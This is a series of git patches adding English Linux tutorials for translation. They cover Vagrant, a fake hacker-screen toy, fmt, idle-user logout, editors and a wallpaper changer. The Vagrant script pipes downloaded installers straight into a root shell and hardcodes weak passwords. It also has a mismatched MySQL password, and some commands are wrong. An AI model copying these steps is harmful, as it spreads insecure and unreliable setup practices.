+
+## Virtual Machines, not all that complex
+
+For years, developers have been using virtual machines as part of their workflow, allowing them to swap and change environments that the software is running in, this is generally to prevent conflicts between projects such as project A needing php 5.3 and project b needing php 5.4.
+
+Also, using Virtual Machines means you only ever need the computer you're working on, you don't need dedicated hardware to mirror the production environment.
+
+It also comes in handy when multiple developers are working on one project, they can all run an environment which contains all of its requirements, but it can be hard maintaining multiple machines and ensuring all have the same versions of all the requirements, this is where Vagrant comes in.
+
+### The benefits of using Virtual Machines
+
+ * Your vm is separate from your host environment
+ * You can have a vm tailor for the requirements of your code
+ * Anything done in one vm does not effect another VM
+ * You can run programs in a vm which your host may not be able to run, such as running some windows only software in a - windows vm on top of ubuntu
+
+
+
+## What is Vagrant
+
+In short, it's a tool that works with virtual box to allow you to automate the creation and removal of a virtual machines.
+
+It revolves around a Config File Called the VagrantFile, which tells vagrant what version of what os you want to install, and some other options such as the IP and Directory Syncing. You can also add a provisioning script of commands to run on the virtual machine.
+
+By Sharing this VagrantFile around, all developers on a project. You will all be using the exact same virtual machine.
+
+## Installing the Requirements
+
+### Install VirtualBox
+
+VirtualBox is the program which will run the Virtual Machine and is available in the Ubuntu Repos
+```
+sudo apt-get install virtualbox
+```
+
+### Install Vagrant
+
+For vagrant itself, you need to head to and install the package for your OS.
+
+### Install Guest Additions
+
+If you intend to sharing any folders with virtual machine, you need to install the following plugin.
+```
+vagrant plugin install vagrant-vbguest
+```
+
+## Setting Up Vagrant
+
+### First we need to create an area for vagrant setups.
+```
+mkdir ~/Vagrant/test-vm
+cd ~/Vagrant/test-vm
+```
+
+### Create the VagrantFile
+```
+vagrant init
+```
+
+### Start the Virtual Machine
+```
+vagrant up
+```
+
+### Login to the Machine
+```
+vagrant-ssh
+```
+
+By this point you will have the basic vagrant box, and a file called VagrantFile.
+
+## Customising
+
+The VagrantFile created in the steps above will look similar to the following
+
+**VagrantFile**
+
+```
+# -*- mode: ruby -*-
+# vi: set ft=ruby :
+# All Vagrant configuration is done below. The "2" in Vagrant.configure
+# configures the configuration version (we support older styles for
+# backwards compatibility). Please don't change it unless you know what
+# you're doing.
+Vagrant.configure("2") do |config|
+ # The most common configuration options are documented and commented below.
+ # For a complete reference, please see the online documentation at
+ # https://docs.vagrantup.com.
+
+ # Every Vagrant development environment requires a box. You can search for
+ # boxes at https://vagrantcloud.com/search.
+ config.vm.box = "base"
+
+ # Disable automatic box update checking. If you disable this, then
+ # boxes will only be checked for updates when the user runs
+ # `vagrant box outdated`. This is not recommended.
+ # config.vm.box_check_update = false
+
+ # Create a forwarded port mapping which allows access to a specific port
+ # within the machine from a port on the host machine. In the example below,
+ # accessing "localhost:8080" will access port 80 on the guest machine.
+ # NOTE: This will enable public access to the opened port
+ # config.vm.network "forwarded_port", guest: 80, host: 8080
+
+ # Create a forwarded port mapping which allows access to a specific port
+ # within the machine from a port on the host machine and only allow access
+ # via 127.0.0.1 to disable public access
+ # config.vm.network "forwarded_port", guest: 80, host: 8080, host_ip: "127.0.0.1"
+
+ # Create a private network, which allows host-only access to the machine
+ # using a specific IP.
+ # config.vm.network "private_network", ip: "192.168.33.10"
+
+ # Create a public network, which generally matched to bridged network.
+ # Bridged networks make the machine appear as another physical device on
+ # your network.
+ # config.vm.network "public_network"
+
+ # Share an additional folder to the guest VM. The first argument is
+ # the path on the host to the actual folder. The second argument is
+ # the path on the guest to mount the folder. And the optional third
+ # argument is a set of non-required options.
+ # config.vm.synced_folder "../data", "/vagrant_data"
+
+ # Provider-specific configuration so you can fine-tune various
+ # backing providers for Vagrant. These expose provider-specific options.
+ # Example for VirtualBox:
+ #
+ # config.vm.provider "virtualbox" do |vb|
+ # # Display the VirtualBox GUI when booting the machine
+ # vb.gui = true
+ #
+ # # Customize the amount of memory on the VM:
+ # vb.memory = "1024"
+ # end
+ #
+ # View the documentation for the provider you are using for more
+ # information on available options.
+
+ # Enable provisioning with a shell script. Additional provisioners such as
+ # Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the
+ # documentation for more information about their specific syntax and use.
+ # config.vm.provision "shell", inline: <<-SHELL
+ # apt-get update
+ # apt-get install -y apache2
+ # SHELL
+end
+```
+
+Now this VagrantFile wll create the basic virtual machine. But the concept behind vagrant is to have the virtual machines set up for our specific tasks. So lets remove the comments and tweak the config.
+
+**VagrantFile**
+```
+# -*- mode: ruby -*-
+# vi: set ft=ruby :
+
+Vagrant.configure("2") do |config|
+ # Set the Linux Version to Debian Jessie
+ config.vm.box = "debian/jessie64"
+ # Set the IP of the Box
+ config.vm.network "private_network", ip: "192.168.33.10"
+ # Sync Our Projects Directory with the WWW directory
+ config.vm.synced_folder "~/Projects", "/var/www/"
+ # Run the following to Provision
+ config.vm.provision "shell", path: "install.sh"
+end
+```
+
+Now we have a simple VagrantFile, Which sets the box to debian jessie, sets an IP for us to use, syncs the folders we are interested in, and finally runs an install.sh, which is where our shell commands can go.
+
+**install.sh**
+```
+#! /usr/bin/env bash
+# Variables
+DBHOST=localhost
+DBNAME=dbname
+DBUSER=dbuser
+DBPASSWD=test123
+
+echo "[ Provisioning machine ]"
+echo "1) Update APT..."
+apt-get -qq update
+
+echo "1) Install Utilities..."
+apt-get install -y tidy pdftk curl xpdf imagemagick openssl vim git
+
+echo "2) Installing Apache..."
+apt-get install -y apache2
+
+echo "3) Installing PHP and packages..."
+apt-get install -y php5 libapache2-mod-php5 libssh2-php php-pear php5-cli php5-common php5-curl php5-dev php5-gd php5-imagick php5-imap php5-intl php5-mcrypt php5-memcached php5-mysql php5-pspell php5-xdebug php5-xmlrpc
+#php5-suhosin-extension, php5-mysqlnd
+
+echo "4) Installing MySQL..."
+debconf-set-selections <<< "mysql-server mysql-server/root_password password secret"
+debconf-set-selections <<< "mysql-server mysql-server/root_password_again password secret"
+apt-get install -y mysql-server
+mysql -uroot -p$DBPASSWD -e "CREATE DATABASE $DBNAME"
+mysql -uroot -p$DBPASSWD -e "grant all privileges on $DBNAME.* to '$DBUSER'@'localhost' identified by '$DBPASSWD'"
+
+echo "5) Generating self signed certificate..."
+mkdir -p /etc/ssl/localcerts
+openssl req -new -x509 -days 365 -nodes -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out /etc/ssl/localcerts/apache.pem -keyout /etc/ssl/localcerts/apache.key
+chmod 600 /etc/ssl/localcerts/apache*
+
+echo "6) Setup Apache..."
+a2enmod rewrite
+> /etc/apache2/sites-enabled/000-default.conf
+echo "
+
+ ServerAdmin [[email protected]][1]
+ DocumentRoot /var/www/
+ ErrorLog ${APACHE_LOG_DIR}/error.log
+ CustomLog ${APACHE_LOG_DIR}/access.log combined
+
+
+" >> /etc/apache2/sites-enabled/000-default.conf
+service apache2 restart
+
+echo "7) Composer Install..."
+curl --silent https://getcomposer.org/installer | php
+mv composer.phar /usr/local/bin/composer
+
+echo "8) Install NodeJS..."
+curl -sL https://deb.nodesource.com/setup_6.x | sudo -E bash -
+apt-get -qq update
+apt-get -y install nodejs
+
+echo "9) Install NPM Packages..."
+npm install -g gulp gulp-cli
+
+echo "Provisioning Completed"
+```
+
+By having the above VagrantFile and Install.sh in your directory, running vagrant up will do the following
+
+ * Create a Virtual Machine Using Debian Jessie
+ * Set the Machines IP to 192.168.33.10
+ * Sync ~/Projects with /var/www/
+ * Install and Setup Apache, Mysql, PHP, Git, Vim
+ * Install and Run Composer
+ * Install Nodejs and gulp
+ * Create A MySQL Database
+ * Create Self Sign Certificates
+
+
+
+By sharing the VagrantFile and install.sh with others, you can work on the exact same environment, on two different machines.
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.chris-shaw.com/blog/how-to-install-and-setup-vagrant
+
+作者:[Christopher Shaw][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.chris-shaw.com
+[1]:/cdn-cgi/l/email-protection
From 8ef49bbb23c0e812bc425a23400b5965d0b62ed8 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 11:45:14 +0800
Subject: [PATCH 049/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Fake=20A=20Hollyw?=
=?UTF-8?q?ood=20Hacker=20Screen=20in=20Linux=20Terminal?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...llywood Hacker Screen in Linux Terminal.md | 72 +++++++++++++++++++
1 file changed, 72 insertions(+)
create mode 100644 sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
diff --git a/sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md b/sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
new file mode 100644
index 0000000000..f826ac57f0
--- /dev/null
+++ b/sources/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
@@ -0,0 +1,72 @@
+Fake A Hollywood Hacker Screen in Linux Terminal
+======
+**Brief: This tiny tool turns your Linux terminal into a Hollywood style real time hacking scene.**
+
+![Hollywood hacking terminal in Linux][1]
+
+I am in!
+
+You might have heard this dialogue in almost every Hollywood movie that shows a hacking scene. There will be a dark terminal with ascii text, diagrams and hex code changing continuously and a hacker who is hitting the keyboards as if he/she is typing an angry forum response.
+
+But that's Hollywood! Hackers break into a network system in minutes whereas it takes months of research to actually do that. But I'll put the Hollywood hacking criticism aside for the moment.
+
+Because we are going to do the same. We are going to pretend like a hacker in Hollywood style.
+
+There's this tiny tool that runs a script turning your Linux terminal into a Hollywood style real time hacking terminal:
+
+Like what you see? It even plays Mission Impossible theme music in the background. Moreover, you get a new, random generated hacking terminal each time you run this tool.
+
+Let's see how to become a Hollywood hacker in 30 seconds.
+
+### How to install Hollywood hacking terminal in Linux
+
+The tool is quite aptly called Hollywood. Basically, it runs in Byobu, a text based Window Manager and it creates a random number of random sized split windows and runs a noisy text app in each of them.
+
+[Byobu][2] is an interesting tool developed by Dustin Kirkland of Ubuntu. More about it in some other article. Let's focus on installing this tool.
+
+Ubuntu users can install Hollywood using this simple command:
+```
+sudo apt install hollywood
+```
+
+If the above command doesn't work in your Ubuntu or other Ubuntu based Linux distributions such as Linux Mint, elementary OS, Zorin OS, Linux Lite etc, you may use the below PPA:
+```
+sudo apt-add-repository ppa:hollywood/ppa
+sudo apt-get update
+sudo apt-get install byobu hollywood
+```
+
+You can also get the source code of Hollywood from its GitHub repository:
+
+[Hollywood on GitHub][3]
+
+Once installed, you can run it using the command below, no sudo required:
+
+`hollywood`
+
+As it runs Byobu first, you'll have to use Ctrl+C twice and then use `exit` command to stop the hacking terminal script.
+
+Here's a video of the fake Hollywood hacking. Do [subscribe to our YouTube channel][4] for more Linux fun videos.
+
+It's a fun little tool that you can use to amaze your friends, family, and colleagues. Maybe you can even impress girls in the bar though I don't think it is going to help you a lot in that field.
+
+And if you liked Hollywood hacking terminal, perhaps you would like to check another tool that gives [Sneaker movie effect in Linux terminal][5].
+
+If you know more such fun utilities, do share with us in the comment section below.
+
+--------------------------------------------------------------------------------
+
+via: https://itsfoss.com/hollywood-hacker-screen/
+
+作者:[Abhishek Prakash][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://itsfoss.com/author/abhishek/
+[1]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/09/hollywood-hacking-linux-terminal.jpg
+[2]:http://byobu.co/
+[3]:https://github.com/dustinkirkland/hollywood
+[4]:https://www.youtube.com/c/itsfoss?sub_confirmation=1
+[5]:https://itsfoss.com/sneakers-movie-effect-linux/
From 04aeaa218e6dff587161b85734402037f82f6952 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 11:50:17 +0800
Subject: [PATCH 050/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Linux=20fmt=20com?=
=?UTF-8?q?mand=20-=20usage=20and=20examples?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... Linux fmt command - usage and examples.md | 93 +++++++++++++++++++
1 file changed, 93 insertions(+)
create mode 100644 sources/tech/20170918 Linux fmt command - usage and examples.md
diff --git a/sources/tech/20170918 Linux fmt command - usage and examples.md b/sources/tech/20170918 Linux fmt command - usage and examples.md
new file mode 100644
index 0000000000..19d0452d96
--- /dev/null
+++ b/sources/tech/20170918 Linux fmt command - usage and examples.md
@@ -0,0 +1,93 @@
+translating by lujun9972
+Linux fmt command - usage and examples
+======
+
+Sometimes you may find yourself in a situation where-in the requirement is to format the contents of a text file. For example, the text file contains one word per line, and the task is to format all the words in a single line. Of course, this can be done manually, but not everyone likes doing time consuming stuff manually. Plus, that's just one use-case - the requirement could be anything.
+
+Gladly, there exists a command that can cater to at-least some of the text formatting requirements. The tool in question is dubbed **fmt**. In this tutorial, we will discuss the basics of fmt, as well as some of main features it provides. Please note that all commands and instructions mentioned here have been tested on Ubuntu 16.04LTS.
+
+### Linux fmt command
+
+The fmt command is a simple text formatting tool available to users of the Linux command line. Following is its basic syntax:
+
+fmt [-WIDTH] [OPTION]... [FILE]...
+
+And here's how the man page describes it:
+
+Reformat each paragraph in the FILE(s), writing to standard output. The option -WIDTH is an abbreviated form of --width=DIGITS.
+
+Following are some Q&A-styled examples that should give you a good idea about fmt's usage.
+
+### Q1. How to format contents of file in single line using fmt?
+
+That's what the fmt command does when used in its basic form (sans any options). You only need to pass the filename as an argument.
+
+fmt [file-name]
+
+The following screenshot shows the command in action:
+
+[![format contents of file in single line][1]][2]
+
+So you can see that multiple lines in the file were formatted in a way that everything got clubbed up in a single line. Please note that the original file (file1 in this case) remains unaffected.
+
+### Q2. How to change maximum line width?
+
+By default, the maximum width of a line that fmt command produces in output is 75. However, if you want, you can change that using the **-w** command line option, which requires a numerical value representing the new limit.
+
+fmt -w [n] [file-name]
+
+Here's an example where width was reduced to 20:
+
+[![change maximum line width][3]][4]
+
+### Q3. How to make fmt highlight the first line?
+
+This can be done by making the indentation of the first line different from the rest, something which you can do by using the **-t** command line option.
+
+fmt -t [file-name]
+
+[![make fmt highlight the first line][5]][6]
+
+### Q4. How to make fmt split long lines?
+
+The fmt command is capable of splitting long lines as well, a feature which you can access using the **-s** command line option.
+
+fmt -s [file-name]
+
+Here's an example of this option:
+
+[![make fmt split long lines][7]][8]
+
+### Q5. How to have separate spacing for words and lines?
+
+The fmt command offers a **-u** option, which ensures one space between words and two between sentences. Here's how you can use it:
+
+fmt -u [file-name]
+
+Note that this feature was enabled by default in our case.
+
+### Conclusion
+
+Agreed, fmt offers limited features, but you can't say it has limited audience. Reason being, you never know when you may need it. Here, in this tutorial, we've covered majority of the command line options that fmt offers. For more details, head to the tool's [man page][9].
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/linux-fmt-command/
+
+作者:[Himanshu Arora][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:https://www.howtoforge.com/images/linux_fmt_command/fmt-basic-usage.png
+[2]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-basic-usage.png
+[3]:https://www.howtoforge.com/images/linux_fmt_command/fmt-w-option.png
+[4]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-w-option.png
+[5]:https://www.howtoforge.com/images/linux_fmt_command/fmt-t-option.png
+[6]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-t-option.png
+[7]:https://www.howtoforge.com/images/linux_fmt_command/fmt-s-option.png
+[8]:https://www.howtoforge.com/images/linux_fmt_command/big/fmt-s-option.png
+[9]:https://linux.die.net/man/1/fmt
From bbb3e70b3f17c1d6820387c9c510e7a5cc2c961d Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 11:52:21 +0800
Subject: [PATCH 051/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Auto?=
=?UTF-8?q?=20Logout=20Inactive=20Users=20After=20A=20Period=20Of=20Time?=
=?UTF-8?q?=20In=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...e Users After A Period Of Time In Linux.md | 135 ++++++++++++++++++
1 file changed, 135 insertions(+)
create mode 100644 sources/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md
diff --git a/sources/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md b/sources/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md
new file mode 100644
index 0000000000..ad6ac12b1d
--- /dev/null
+++ b/sources/tech/20170916 How To Auto Logout Inactive Users After A Period Of Time In Linux.md
@@ -0,0 +1,135 @@
+translating by lujun9972
+How To Auto Logout Inactive Users After A Period Of Time In Linux
+======
+
+![](https://www.ostechnix.com/wp-content/uploads/2017/09/logout-720x340.jpg)
+
+Let us picture this scenario. You have a shared server which is regularly being accessed by many users from all systems in the network. There are chances that some user may forget to logout his session and left the session open. As we all know, leaving an user session open is dangerous. Some users may do some damage intentionally. Would you, as a system admin, go and check each and every system to verify whether the users have logged out or not? Not necessary. Also, It's quite time consuming process if you have hundreds of machines in your network. Instead, you can make an user to auto logout from a local or SSH session after a particular period of inactivity. This brief tutorial describes how to auto logout inactive users after a particular period of time in Unix-like systems. It's not that difficult. Follow me.
+
+### Auto Logout Inactive Users After A Period Of Time In Linux
+
+We can do it in three ways. Let us see the first method.
+
+**Method 1:**
+
+Edit **~/.bashrc** or **~/.bash_profile** file:
+```
+$ vi ~/.bashrc
+```
+
+Or,
+```
+$ vi ~/.bash_profile
+```
+
+Add the following lines in it.
+```
+TMOUT=100
+```
+
+This makes the user to logout automatically after an inactivity of 100 seconds. You can define this value as per your convenient. Save and close the file.
+
+Apply the changes by running the following command:
+```
+$ source ~/.bashrc
+```
+
+Or,
+```
+$ source ~/.bash_profile
+```
+
+Now, leave the session idle for 100 seconds. After an inactivity of 100 seconds, you will see the following message and the user will automatically logged out from the session.
+```
+timed out waiting for input: auto-logout
+Connection to 192.168.43.2 closed.
+```
+
+This setting can be easily modified by the user. Because, ~/.bashrc file is owned by the user himself.
+
+To modify or delete this timeout settings, simply delete the lines added above and apply the changes by running "source ~/.bashrc" command.
+
+Alternatively, the user can disable this by running the following commands:
+```
+$ export TMOUT=0
+```
+
+Or,
+```
+$ unset TMOUT
+```
+
+If you want to prevent the user from changing the settings, follow second method instead.
+
+**Method 2:**
+
+Log in as root user.
+
+Create a new file called **" autologout.sh"**.
+```
+# vi /etc/profile.d/autologout.sh
+```
+
+Add the following lines:
+```
+TMOUT=100
+readonly TMOUT
+export TMOUT
+```
+
+Save and close the file.
+
+Make it as executable using command:
+```
+# chmod +x /etc/profile.d/autologout.sh
+```
+
+Now, logout or reboot your system. The inactive user will automatically be logged out after 100 seconds. The normal user can't change this settings even if he/she wanted to stay in the session. They will be thrown out exactly after 100 seconds.
+
+These two methods are are applicable for both local session and remote session i.e the locally logged-in users or and/or the users logged-in from a remote system via SSH. Next we are going to see how to automatically logout only the inactive SSH sessions, not local sessions.
+
+**Method 3:**
+
+In this method, we will only making the SSH session users to log out after a particular period of inactivity.
+
+Edit **/etc/ssh/sshd_config** file:
+```
+$ sudo vi /etc/ssh/sshd_config
+```
+
+Add/modify the following lines:
+```
+ClientAliveInterval 100
+ClientAliveCountMax 0
+```
+
+Save and close this file. Restart sshd service to take effect the changes.
+```
+$ sudo systemctl restart sshd
+```
+
+Now, ssh to this system from a remote system. After 100 seconds, the ssh session will be automatically closed and you will see the following message:
+```
+$ Connection to 192.168.43.2 closed by remote host.
+Connection to 192.168.43.2 closed.
+```
+
+Now, whoever access this system from a remote system via SSH will automatically be logged out after an inactivity of 100 seconds.
+
+Hope this helps. I will be soon here with another useful guide. If you find our guides helpful, please share them on your social, professional networks and support OSTechNix!
+
+Cheers!
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/auto-logout-inactive-users-period-time-linux/
+
+作者:[SK][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
From b5ae04fd155b3116444dab81787294095fec3096 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 11:57:22 +0800
Subject: [PATCH 052/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=203=20text=20editor?=
=?UTF-8?q?=20alternatives=20to=20Emacs=20and=20Vim?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...xt editor alternatives to Emacs and Vim.md | 102 ++++++++++++++++++
1 file changed, 102 insertions(+)
create mode 100644 sources/tech/20170918 3 text editor alternatives to Emacs and Vim.md
diff --git a/sources/tech/20170918 3 text editor alternatives to Emacs and Vim.md b/sources/tech/20170918 3 text editor alternatives to Emacs and Vim.md
new file mode 100644
index 0000000000..742e1d9f92
--- /dev/null
+++ b/sources/tech/20170918 3 text editor alternatives to Emacs and Vim.md
@@ -0,0 +1,102 @@
+3 text editor alternatives to Emacs and Vim
+======
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/computer_keyboard_laptop_development_blue.png?itok=IfckxN48)
+
+Before you start reaching for those implements of mayhem, Emacs and Vim fans, understand that this article isn't about putting the boot to your favorite editor. I'm a professed Emacs guy, but one who also likes Vim. A lot.
+
+That said, I realize that Emacs and Vim aren't for everyone. It might be that the silliness of the so-called [Editor war][1] has turned some people off. Or maybe they just want an editor that is less demanding and has a more modern sheen.
+
+If you're looking for an alternative to Emacs or Vim, keep reading. Here are three that might interest you.
+
+### Geany
+
+
+![Editing a LaTeX document with Geany][3]
+
+
+Editing a LaTeX document with Geany
+
+[Geany][4] is an old favorite from the days when I computed on older hardware running lightweight Linux distributions. Geany started out as my [LaTeX][5] editor, but quickly became the app in which I did all of my text editing.
+
+Although Geany is billed as a small and fast [IDE][6] (integrated development environment), it's definitely not just a techie's tool. Geany is small and it is fast, even on older hardware or a [Chromebook running Linux][7]. You can use Geany for everything from editing configuration files to maintaining a task list or journal, from writing an article or a book to doing some coding and scripting.
+
+[Plugins][8] give Geany a bit of extra oomph. Those plugins expand the editor's capabilities, letting you code or work with markup languages more effectively, manipulate text, and even check your spelling.
+
+### Atom
+
+
+![Editing a webpage with Atom][10]
+
+
+Editing a webpage with Atom
+
+[Atom][11] is a new-ish kid in the text editing neighborhood. In the short time it's been on the scene, though, Atom has gained a dedicated following.
+
+What makes Atom attractive is that you can customize it. If you're of a more technical bent, you can fiddle with the editor's configuration. If you aren't all that technical, Atom has [a number of themes][12] you can use to change how the editor looks.
+
+And don't discount Atom's thousands of [packages][13]. They extend the editor in many different ways, enabling you to turn it into the text editing or development environment that's right for you. Atom isn't just for coders. It's a very good [text editor for writers][14], too.
+
+### Xed
+
+![Writing this article in Xed][16]
+
+
+Writing this article in Xed
+
+Maybe Atom and Geany are a bit heavy for your tastes. Maybe you want a lighter editor, something that's not bare bones but also doesn't have features you'll rarely (if ever) use. In that case, [Xed][17] might be what you're looking for.
+
+If Xed looks familiar, it's a fork of the Pluma text editor for the MATE desktop environment. I've found that Xed is a bit faster and a bit more responsive than Pluma--your mileage may vary, though.
+
+Although Xed isn't as rich in features as other editors, it doesn't do too badly. It has solid syntax highlighting, a better-than-average search and replace function, a spelling checker, and a tabbed interface for editing multiple files in a single window.
+
+### Other editors worth exploring
+
+I'm not a KDE guy, but when I worked in that environment, [KDevelop][18] was my go-to editor for heavy-duty work. It's a lot like Geany in that KDevelop is powerful and flexible without a lot of bulk.
+
+Although I've never really felt the love, more than a couple of people I know swear by [Brackets][19]. It is powerful, and I have to admit its [extensions][20] look useful.
+
+Billed as a "text editor for developers," [Notepadqq][21] is an editor that's reminiscent of [Notepad++][22]. It's in the early stages of development, but Notepadqq does look promising.
+
+[Gedit][23] and [Kate][24] are excellent for anyone whose text editing needs are simple. They're definitely not bare bones--they pack enough features to do heavy text editing. Both Gedit and Kate balance that by being speedy and easy to use.
+
+Do you have another favorite text editor that's not Emacs or Vim? Feel free to share by leaving a comment.
+
+### About The Author
+Scott Nesbitt;I'M A Long-Time User Of Free Open Source Software;Write Various Things For Both Fun;Profit. I Don'T Take Myself Too Seriously;I Do All Of My Own Stunts. You Can Find Me At These Fine Establishments On The Web
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/17/9/3-alternatives-emacs-and-vim
+
+作者:[Scott Nesbitt][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/scottnesbitt
+[1]:https://en.wikipedia.org/wiki/Editor_war
+[2]:/file/370196
+[3]:https://opensource.com/sites/default/files/u128651/geany.png (Editing a LaTeX document with Geany)
+[4]:https://www.geany.org/
+[5]:https://opensource.com/article/17/6/introduction-latex
+[6]:https://en.wikipedia.org/wiki/Integrated_development_environment
+[7]:https://opensource.com/article/17/4/linux-chromebook-gallium-os
+[8]:http://plugins.geany.org/
+[9]:/file/370191
+[10]:https://opensource.com/sites/default/files/u128651/atom.png (Editing a webpage with Atom)
+[11]:https://atom.io
+[12]:https://atom.io/themes
+[13]:https://atom.io/packages
+[14]:https://opensource.com/article/17/5/atom-text-editor-packages-writers
+[15]:/file/370201
+[16]:https://opensource.com/sites/default/files/u128651/xed.png (Writing this article in Xed)
+[17]:https://github.com/linuxmint/xed
+[18]:https://www.kdevelop.org/
+[19]:http://brackets.io/
+[20]:https://registry.brackets.io/
+[21]:http://notepadqq.altervista.org/s/
+[22]:https://opensource.com/article/16/12/notepad-text-editor
+[23]:https://wiki.gnome.org/Apps/Gedit
+[24]:https://kate-editor.org/
From ead2ca9dbae2af5a1accc45cd440707088aacdae Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 11:59:05 +0800
Subject: [PATCH 053/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Two=20Easy=20Ways?=
=?UTF-8?q?=20To=20Install=20Bing=20Desktop=20Wallpaper=20Changer=20On=20L?=
=?UTF-8?q?inux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...Bing Desktop Wallpaper Changer On Linux.md | 137 ++++++++++++++++++
1 file changed, 137 insertions(+)
create mode 100644 sources/tech/20170918 Two Easy Ways To Install Bing Desktop Wallpaper Changer On Linux.md
diff --git a/sources/tech/20170918 Two Easy Ways To Install Bing Desktop Wallpaper Changer On Linux.md b/sources/tech/20170918 Two Easy Ways To Install Bing Desktop Wallpaper Changer On Linux.md
new file mode 100644
index 0000000000..9e9dbb814c
--- /dev/null
+++ b/sources/tech/20170918 Two Easy Ways To Install Bing Desktop Wallpaper Changer On Linux.md
@@ -0,0 +1,137 @@
+Two Easy Ways To Install Bing Desktop Wallpaper Changer On Linux
+======
+Are you bored with Linux desktop background and wants to set good looking wallpapers but don't know where to find? Don't worry we are here to help you.
+
+We all knows about bing search engine but most of us don't use that for some reasons and every one like Bing website background wallpapers which is very beautiful and stunning high-resolution images.
+
+If you would like to have these images as your desktop wallpapers you can do it manually but it's very difficult to download a new image daily and then set it as wallpaper. That's where automatic wallpaper changers comes into picture.
+
+[Bing Desktop Wallpaper Changer][1] will automatically downloads and changes desktop wallpaper to Bing Photo of the Day. All the wallpapers are stored in `/home/[user]/Pictures/BingWallpapers/`.
+
+### Method-1 : Using Utkarsh Gupta Shell Script
+
+This small python script, automatically downloading and changing the desktop wallpaper to Bing Photo of the day. The script runs automatically at the startup and works on GNU/Linux with Gnome or Cinnamon and there is no manual work and installer does everything for you.
+
+From version 2.0+, the Installer works like a normal Linux binary commands and It requests sudo permissions for some of the task.
+
+Just clone the repository and navigate to project's directory then run the shell script to install Bing Desktop Wallpaper Changer.
+```
+$ https://github.com/UtkarshGpta/bing-desktop-wallpaper-changer/archive/master.zip
+$ unzip master
+$ cd bing-desktop-wallpaper-changer-master
+
+```
+
+Run the `installer.sh` file with `--install` option to install Bing Desktop Wallpaper Changer. This will download and set Bing Photo of the Day for your Linux desktop.
+```
+$ ./installer.sh --install
+
+Bing-Desktop-Wallpaper-Changer
+BDWC Installer v3_beta2
+
+GitHub:
+Contributors:
+.
+.
+[sudo] password for daygeek: **
+
+******
+
+**
+.
+Where do you want to install Bing-Desktop-Wallpaper-Changer?
+ Entering 'opt' or leaving input blank will install in /opt/bing-desktop-wallpaper-changer
+ Entering 'home' will install in /home/daygeek/bing-desktop-wallpaper-changer
+ Install Bing-Desktop-Wallpaper-Changer in (opt/home)? : **
+
+Press Enter
+
+**
+
+Should we create bing-desktop-wallpaper-changer symlink to /usr/bin/bingwallpaper so you could easily execute it?
+ Create symlink for easy execution, e.g. in Terminal (y/n)? : **
+
+y
+
+**
+
+Should bing-desktop-wallpaper-changer needs to autostart when you log in? (Add in Startup Application)
+ Add in Startup Application (y/n)? : **
+
+y
+
+**
+.
+.
+Executing bing-desktop-wallpaper-changer...
+
+
+Finished!!
+
+```
+
+[![][2]![][2]][3]
+
+To uninstall the script.
+```
+$ ./installer.sh --uninstall
+
+```
+
+Navigate to help page to know more options about this script.
+```
+$ ./installer.sh --help
+
+```
+
